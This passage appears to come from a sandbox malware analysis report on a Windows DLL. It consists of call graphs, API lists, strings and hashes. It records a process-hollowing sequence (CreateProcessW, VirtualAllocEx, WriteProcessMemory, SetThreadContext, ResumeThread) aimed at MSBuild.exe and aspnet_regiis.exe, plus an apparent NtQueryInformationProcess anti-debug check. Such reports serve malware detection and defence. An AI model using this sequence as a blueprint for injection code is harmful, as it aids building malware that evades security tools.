6e811c30 __freea 14 API calls 11473->11477 11474->11473 11476 6e814881 11475->11476 11478 6e811c30 __freea 14 API calls 11475->11478 11479 6e814893 11476->11479 11480 6e811c30 __freea 14 API calls 11476->11480 11477->11475 11478->11476 11481 6e8148a5 11479->11481 11482 6e811c30 __freea 14 API calls 11479->11482 11480->11479 11483 6e811c30 __freea 14 API calls 11481->11483 11481->11484 11482->11481 11483->11484 11484->11436 11486 6e814920 11485->11486 11487 6e8148c8 11485->11487 11486->11438 11488 6e8148d8 11487->11488 11490 6e811c30 __freea 14 API calls 11487->11490 11489 6e8148ea 11488->11489 11491 6e811c30 __freea 14 API calls 11488->11491 11492 6e8148fc 11489->11492 11493 6e811c30 __freea 14 API calls 11489->11493 11490->11488 11491->11489 11494 6e81490e 11492->11494 11495 6e811c30 __freea 14 API calls 11492->11495 11493->11492 11494->11486 11496 6e811c30 __freea 14 API calls 11494->11496 11495->11494 11496->11486 11498 6e81463d 11497->11498 11499 6e81461e 11497->11499 11498->11442 11499->11498 11503 6e814949 11499->11503 11502 6e811c30 __freea 14 API calls 11502->11498 11504 6e814637 11503->11504 11505 6e81495a 11503->11505 11504->11502 11506 6e814924 _unexpected 14 API calls 11505->11506 11507 6e814962 11506->11507 11508 6e814924 _unexpected 14 API calls 11507->11508 11509 6e81496d 11508->11509 11510 6e814924 _unexpected 14 API calls 11509->11510 11511 6e814978 11510->11511 11512 6e814924 _unexpected 14 API calls 11511->11512 11513 6e814983 11512->11513 11514 6e814924 _unexpected 14 API calls 11513->11514 11515 6e814991 11514->11515 11516 6e811c30 __freea 14 API calls 11515->11516 11517 6e81499c 11516->11517 11518 6e811c30 __freea 14 API calls 11517->11518 11519 6e8149a7 11518->11519 11520 6e811c30 __freea 14 API calls 11519->11520 11521 6e8149b2 11520->11521 11522 6e814924 _unexpected 14 API calls 11521->11522 11523 6e8149c0 11522->11523 11524 6e814924 _unexpected 14 API calls 11523->11524 11525 6e8149ce 11524->11525 11526 6e814924 _unexpected 14 API calls 11525->11526 11527 6e8149df 11526->11527 11528 6e814924 _unexpected 14 API calls 11527->11528 11529 6e8149ed 11528->11529 11530 6e814924 _unexpected 14 API calls 11529->11530 11531 6e8149fb 11530->11531 11532 6e811c30 __freea 14 API calls 11531->11532 11533 6e814a06 11532->11533 11534 6e811c30 __freea 14 API calls 11533->11534 11535 6e814a11 11534->11535 11536 6e811c30 __freea 14 API calls 11535->11536 11537 6e814a1c 11536->11537 11538 6e811c30 __freea 14 API calls 11537->11538 11538->11504 11539->11428 11541 6e80ea8d 11540->11541 11547 6e80bfec 11540->11547 11548 6e80f155 11541->11548 11544 6e80f190 ___vcrt_FlsSetValue 6 API calls 11545 6e80eaa3 11544->11545 11553 6e80ea67 11545->11553 11547->11250 11549 6e80eff4 ___vcrt_InitializeCriticalSectionEx 5 API calls 11548->11549 11550 6e80f16f 11549->11550 11551 6e80f187 TlsGetValue 11550->11551 11552 6e80ea94 11550->11552 11551->11552 11552->11544 11554 6e80ea71 11553->11554 11555 6e80ea7e 11553->11555 11554->11555 11556 6e810543 ___std_type_info_destroy_list 14 API calls 11554->11556 11555->11547 11556->11555 11563 6e80eabc 11557->11563 11559 6e80bfc8 11559->11273 11560 6e811200 11559->11560 11561 6e811908 __dosmaperr 14 API calls 11560->11561 11562 6e80bfd4 11561->11562 11562->11276 11562->11277 11564 6e80eac5 11563->11564 11565 6e80eac8 GetLastError 11563->11565 11564->11559 11566 6e80f155 ___vcrt_FlsGetValue 6 API calls 11565->11566 11567 6e80eadd 11566->11567 11568 6e80eafc 11567->11568 11569 6e80eb42 SetLastError 11567->11569 11570 6e80f190 ___vcrt_FlsSetValue 6 API calls 11567->11570 11568->11569 11569->11559 11571 6e80eaf6 __InternalCxxFrameHandler 11570->11571 11571->11568 11572 6e80eb1e 11571->11572 11573 6e80f190 ___vcrt_FlsSetValue 6 API calls 11571->11573 11574 6e80f190 ___vcrt_FlsSetValue 6 API calls 11572->11574 11575 6e80eb32 11572->11575 11573->11572 11574->11575 11576 6e810543 ___std_type_info_destroy_list 14 API calls 11575->11576 11576->11568

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 6E7F9DF0 Relevance: 85.8, APIs: 18, Strings: 27, Instructions: 7065injectionmemorythreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleWindow.KERNELBASE ref: 6E7FF193
                                                                                                                                                                    • ShowWindow.USER32 ref: 6E7FF1A9
                                                                                                                                                                    • VirtualAlloc.KERNELBASE(?,?,?,?,?), ref: 6E7FF2E3
                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E7FF43E
                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?,?), ref: 6E7FF618
                                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?,?), ref: 6E7FF779
                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?,?,?), ref: 6E7FF828
                                                                                                                                                                    • WriteProcessMemory.KERNELBASE ref: 6E7FFA61
                                                                                                                                                                    • ReadProcessMemory.KERNEL32 ref: 6E80042D
                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?,?), ref: 6E8004B3
                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?,?), ref: 6E8008C4
                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32 ref: 6E800914
                                                                                                                                                                    • ResumeThread.KERNELBASE ref: 6E800991
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 6E800A2C
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 6E800A40
                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?), ref: 6E800F54
                                                                                                                                                                    • ResumeThread.KERNEL32 ref: 6E8010B9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$Memory$Write$AllocThreadVirtual$CloseHandleResumeWindow$ConsoleContextCreateReadShowWow64
                                                                                                                                                                    • String ID: "wC$$`[2$57($:/U|$;}UH$?35$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$G*d)$G*d)$N3`$N3`$Vs$Y*J$Y*J$\ion$kernel32.dll$ntdll.dll$onA $o}La$rRNe$tof$|M+$}mH$0*|
                                                                                                                                                                    • API String ID: 1613124053-3344266483
                                                                                                                                                                    • Opcode ID: e21aca25d489973a0baa28dc6c439089467ad9334a6c43196acd8a417fd89ab0
                                                                                                                                                                    • Instruction ID: 814aa8c84bcacb7b6e233375c0ad389b930b9c581675353a93bee540274b2dfc
                                                                                                                                                                    • Opcode Fuzzy Hash: e21aca25d489973a0baa28dc6c439089467ad9334a6c43196acd8a417fd89ab0
                                                                                                                                                                    • Instruction Fuzzy Hash: A2C3C336A44219CFCB54CEADCE947DA77F1AB47324F00499AD819EB364C6369E89CF01
                                                                                                                                                                    Function 6E7F7510 Relevance: 32.9, APIs: 15, Strings: 3, Instructions: 1449filememoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$Close$File$CreateModule$CurrentMappingNameProcessProtectVirtual
                                                                                                                                                                    • String ID: @$O>&|$}mH
                                                                                                                                                                    • API String ID: 4094253665-349066882
                                                                                                                                                                    • Opcode ID: 0217216b565298a2b451a2480a79fdb8a75d2d1f958ed57b5bedd759da943e52
                                                                                                                                                                    • Instruction ID: 1e84d048af3d0948216ee6249cf064a49f0c16dd47f58dbe2267c8ae342899a6
                                                                                                                                                                    • Opcode Fuzzy Hash: 0217216b565298a2b451a2480a79fdb8a75d2d1f958ed57b5bedd759da943e52
                                                                                                                                                                    • Instruction Fuzzy Hash: DEC2F075A44615CFDB14CFBDCAA47CA7BF1AB46310F008199D859EB3A0D7358A8ACF81
                                                                                                                                                                    Function 6E7F9610 Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 418COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1402 6e7f9610-6e7f966b GetModuleHandleW call 6e7f8cc0 call 6e80c690 1407 6e7f9672-6e7f967d 1402->1407 1408 6e7f9a33-6e7f9a3a 1407->1408 1409 6e7f9683-6e7f9690 1407->1409 1411 6e7f9c18 1408->1411 1412 6e7f9809-6e7f9823 1409->1412 1413 6e7f9696-6e7f96a3 1409->1413 1411->1407 1412->1411 1415 6e7f96a9-6e7f96b6 1413->1415 1416 6e7f9a52-6e7f9a59 1413->1416 1418 6e7f9a3f-6e7f9a4d 1415->1418 1419 6e7f96bc-6e7f96c9 1415->1419 1416->1411 1418->1411 1421 6e7f96cf-6e7f96dc 1419->1421 1422 6e7f9c05-6e7f9c0c 1419->1422 1424 6e7f9b7f-6e7f9bc8 1421->1424 1425 6e7f96e2-6e7f96ef 1421->1425 1422->1411 1424->1411 1427 6e7f96f5-6e7f9702 1425->1427 1428 6e7f9c11 1425->1428 1430 6e7f992f-6e7f9936 1427->1430 1431 6e7f9708-6e7f9715 1427->1431 1428->1411 1430->1411 1433 6e7f9a5e-6e7f9acc 1431->1433 1434 6e7f971b-6e7f9728 1431->1434 1433->1411 1436 6e7f972e-6e7f973b 1434->1436 1437 6e7f9b31-6e7f9b7a 1434->1437 1439 6e7f98be-6e7f992a 1436->1439 1440 6e7f9741-6e7f974e 1436->1440 1437->1411 1439->1411 1442 6e7f9bcd-6e7f9be6 call 6e80b8f0 1440->1442 1443 6e7f9754-6e7f9761 1440->1443 1446 6e7f9767-6e7f9774 1443->1446 1447 6e7f9ad1-6e7f9b20 1443->1447 1450 6e7f977a-6e7f9787 1446->1450 1451 6e7f9b25-6e7f9b2c 1446->1451 1447->1411 1453 6e7f99ae-6e7f9a22 1450->1453 1454 6e7f978d-6e7f979a 1450->1454 1451->1411 1453->1411 1456 6e7f9be7-6e7f9bee 1454->1456 1457 6e7f97a0-6e7f97ad 1454->1457 1456->1411 1459 6e7f9bf3-6e7f9c00 1457->1459 1460 6e7f97b3-6e7f97c0 1457->1460 1459->1411 1462 6e7f993b-6e7f99a9 1460->1462 1463 6e7f97c6-6e7f97d3 1460->1463 1462->1411 1465 6e7f97d9-6e7f97e6 1463->1465 1466 6e7f9a27-6e7f9a2e 1463->1466 1468 6e7f97ec-6e7f97f9 1465->1468 1469 6e7f9870-6e7f98b9 1465->1469 1466->1411 1471 6e7f97ff-6e7f9804 1468->1471 1472 6e7f9828-6e7f986b NtQueryInformationProcess 1468->1472 1469->1411 1471->1411 1472->1411
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                    • String ID: 7`7$7`7$NtQueryInformationProcess$O&Y0$P/hJ$P/hJ$ntdll.dll$pUNS$pUNS$}mH
                                                                                                                                                                    • API String ID: 4139908857-1130171200
                                                                                                                                                                    • Opcode ID: 8986875a265e3284df7b0386b02a2fa5092105d0499d42239d68a82ba9c79bc2
                                                                                                                                                                    • Instruction ID: f88dbd989beb7aba940e5592d1010c86a24e1c382e250826f0830925084b1ed1
                                                                                                                                                                    • Opcode Fuzzy Hash: 8986875a265e3284df7b0386b02a2fa5092105d0499d42239d68a82ba9c79bc2
                                                                                                                                                                    • Instruction Fuzzy Hash: EEE1AF36A55205CFCB08CEFDC6943CE7BE2AB57320F14512AD825EB364D63A994ACB41
                                                                                                                                                                    Function 6E80BABE Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1474 6e80babe-6e80bad1 call 6e80c370 1477 6e80bad3-6e80bad5 1474->1477 1478 6e80bad7-6e80baf9 call 6e80bf58 1474->1478 1479 6e80bb40-6e80bb4f 1477->1479 1482 6e80bb66-6e80bb7f call 6e80c1f2 call 6e80c370 1478->1482 1483 6e80bafb-6e80bb3e call 6e80c023 call 6e80bedf call 6e80c33b call 6e80bb53 call 6e80c1c4 call 6e80bb60 1478->1483 1494 6e80bb90-6e80bb97 1482->1494 1495 6e80bb81-6e80bb87 1482->1495 1483->1479 1498 6e80bba3-6e80bbb7 dllmain_raw 1494->1498 1499 6e80bb99-6e80bb9c 1494->1499 1495->1494 1497 6e80bb89-6e80bb8b 1495->1497 1503 6e80bc69-6e80bc78 1497->1503 1501 6e80bc60-6e80bc67 1498->1501 1502 6e80bbbd-6e80bbce dllmain_crt_dispatch 1498->1502 1499->1498 1504 6e80bb9e-6e80bba1 1499->1504 1501->1503 1502->1501 1506 6e80bbd4-6e80bbe6 call 6e8010e0 1502->1506 1504->1506 1513 6e80bbe8-6e80bbea 1506->1513 1514 6e80bc0f-6e80bc11 1506->1514 1513->1514 1515 6e80bbec-6e80bc0a call 6e8010e0 call 6e80babe dllmain_raw 1513->1515 1516 6e80bc13-6e80bc16 1514->1516 1517 6e80bc18-6e80bc29 dllmain_crt_dispatch 1514->1517 1515->1514 1516->1501 1516->1517 1517->1501 1519 6e80bc2b-6e80bc5d dllmain_raw 1517->1519 1519->1501
                                                                                                                                                                    APIs
                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6E80BB05
                                                                                                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6E80BB1F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2442719207-0
                                                                                                                                                                    • Opcode ID: a539c52eeab8e408e95e23f5506504f47f44cb526250b4855cb42a653c9f6008
                                                                                                                                                                    • Instruction ID: bee782192a292a7a9e7485e90811731ce94edb74bf276b0acfac055dc2ca2ae7
                                                                                                                                                                    • Opcode Fuzzy Hash: a539c52eeab8e408e95e23f5506504f47f44cb526250b4855cb42a653c9f6008
                                                                                                                                                                    • Instruction Fuzzy Hash: B141C472E05659EFDB608FDDCC40BAE76B8EF417A4F014D19E814672A8D7704D41CBA0
                                                                                                                                                                    Function 6E80BB6E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1524 6e80bb6e-6e80bb7f call 6e80c370 1527 6e80bb90-6e80bb97 1524->1527 1528 6e80bb81-6e80bb87 1524->1528 1530 6e80bba3-6e80bbb7 dllmain_raw 1527->1530 1531 6e80bb99-6e80bb9c 1527->1531 1528->1527 1529 6e80bb89-6e80bb8b 1528->1529 1534 6e80bc69-6e80bc78 1529->1534 1532 6e80bc60-6e80bc67 1530->1532 1533 6e80bbbd-6e80bbce dllmain_crt_dispatch 1530->1533 1531->1530 1535 6e80bb9e-6e80bba1 1531->1535 1532->1534 1533->1532 1536 6e80bbd4-6e80bbe6 call 6e8010e0 1533->1536 1535->1536 1539 6e80bbe8-6e80bbea 1536->1539 1540 6e80bc0f-6e80bc11 1536->1540 1539->1540 1541 6e80bbec-6e80bc0a call 6e8010e0 call 6e80babe dllmain_raw 1539->1541 1542 6e80bc13-6e80bc16 1540->1542 1543 6e80bc18-6e80bc29 dllmain_crt_dispatch 1540->1543 1541->1540 1542->1532 1542->1543 1543->1532 1545 6e80bc2b-6e80bc5d dllmain_raw 1543->1545 1545->1532
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3136044242-0
                                                                                                                                                                    • Opcode ID: c80ba8583cab5468f407d8df57b0ee173744fb1becbd65ba23c0238e9fe835cd
                                                                                                                                                                    • Instruction ID: 0da9f0d3d69b46444adeda204618436617184d7e1826cddbc1ee58973f5ce612
                                                                                                                                                                    • Opcode Fuzzy Hash: c80ba8583cab5468f407d8df57b0ee173744fb1becbd65ba23c0238e9fe835cd
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E21A371E01619EFDBA18ED9CC90EAF3A68DF81B94F014D19F81467268D7318D418BE0
                                                                                                                                                                    Function 6E80B9B7 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1550 6e80b9b7-6e80b9c5 call 6e80c370 call 6e80c053 1554 6e80b9ca-6e80b9cd 1550->1554 1555 6e80b9d3-6e80b9eb call 6e80bf58 1554->1555 1556 6e80baa4 1554->1556 1560 6e80b9f1-6e80ba02 call 6e80bfb5 1555->1560 1561 6e80bab6-6e80babd call 6e80c1f2 1555->1561 1558 6e80baa6-6e80bab5 1556->1558 1566 6e80ba51-6e80ba5f call 6e80ba9a 1560->1566 1567 6e80ba04-6e80ba26 call 6e80c30f call 6e80bed3 call 6e80bef7 call 6e810589 1560->1567 1566->1556 1572 6e80ba61-6e80ba6b call 6e80c1ec 1566->1572 1567->1566 1585 6e80ba28-6e80ba2f call 6e80bf8a 1567->1585 1578 6e80ba8c-6e80ba95 1572->1578 1579 6e80ba6d-6e80ba76 call 6e80c113 1572->1579 1578->1558 1579->1578 1586 6e80ba78-6e80ba8a 1579->1586 1585->1566 1590 6e80ba31-6e80ba4e call 6e81055e 1585->1590 1586->1578 1590->1566
                                                                                                                                                                    APIs
                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6E80BA04
                                                                                                                                                                      • Part of subcall function 6E80BED3: InitializeSListHead.KERNEL32(6E880CC0,6E80BA0E,6E81ED80,00000010,6E80B99F,?,?,?,6E80BBC7,?,00000001,?,?,00000001,?,6E81EDC8), ref: 6E80BED8
                                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E80BA6E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3231365870-0
                                                                                                                                                                    • Opcode ID: a604ca9a55246308afe6e6e986fe050aec5d544e2cec868262a8f5aa641075fb
                                                                                                                                                                    • Instruction ID: f57a4eda165d4b533aee0430204b7f8d922d96c738fe44cccb6ebf483c6ee239
                                                                                                                                                                    • Opcode Fuzzy Hash: a604ca9a55246308afe6e6e986fe050aec5d544e2cec868262a8f5aa641075fb
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D210F3228A6079FEB50AFFC9C187DE37668F0336CF100C19D9557B2C6DB254184CAA2
                                                                                                                                                                    Function 6E8138E1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1593 6e8138e1-6e8138e6 1594 6e8138e8-6e813900 1593->1594 1595 6e813902-6e813906 1594->1595 1596 6e81390e-6e813917 1594->1596 1595->1596 1599 6e813908-6e81390c 1595->1599 1597 6e813929 1596->1597 1598 6e813919-6e81391c 1596->1598 1603 6e81392b-6e813938 GetStdHandle 1597->1603 1601 6e813925-6e813927 1598->1601 1602 6e81391e-6e813923 1598->1602 1600 6e813983-6e813987 1599->1600 1600->1594 1606 6e81398d-6e813990 1600->1606 1601->1603 1602->1603 1604 6e813965-6e813977 1603->1604 1605 6e81393a-6e81393c 1603->1605 1604->1600 1608 6e813979-6e81397c 1604->1608 1605->1604 1607 6e81393e-6e813947 GetFileType 1605->1607 1607->1604 1609 6e813949-6e813952 1607->1609 1608->1600 1610 6e813954-6e813958 1609->1610 1611 6e81395a-6e81395d 1609->1611 1610->1600 1611->1600 1612 6e81395f-6e813963 1611->1612 1612->1600
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 6E81392D
                                                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 6E81393F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                                    • Opcode ID: 9f69d78c207dfbd9a80aea485114126b021385c97b8f9ac5d2ea20ca7377c455
                                                                                                                                                                    • Instruction ID: b212dbdefaed94099e06d35353cdc34f235d6f281500801e2e2da65c048a58cd
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f69d78c207dfbd9a80aea485114126b021385c97b8f9ac5d2ea20ca7377c455
                                                                                                                                                                    • Instruction Fuzzy Hash: F511E17160CB478AC7204ABF8C9C796FA95A787230B260F5ED4BA925F1C734D886C280

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 6E8044A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %p;2$%p;2$}mH
                                                                                                                                                                    • API String ID: 0-4058848594
                                                                                                                                                                    • Opcode ID: 1df655931d8d847b82ffe247cb2d3b305029c1c8937d4cacf8913cef6ceb3a81
                                                                                                                                                                    • Instruction ID: 5d2919887bc2698bd6b5e57af093e6bd3e8c5fbb4ed7f4da218d2eeb434b186e
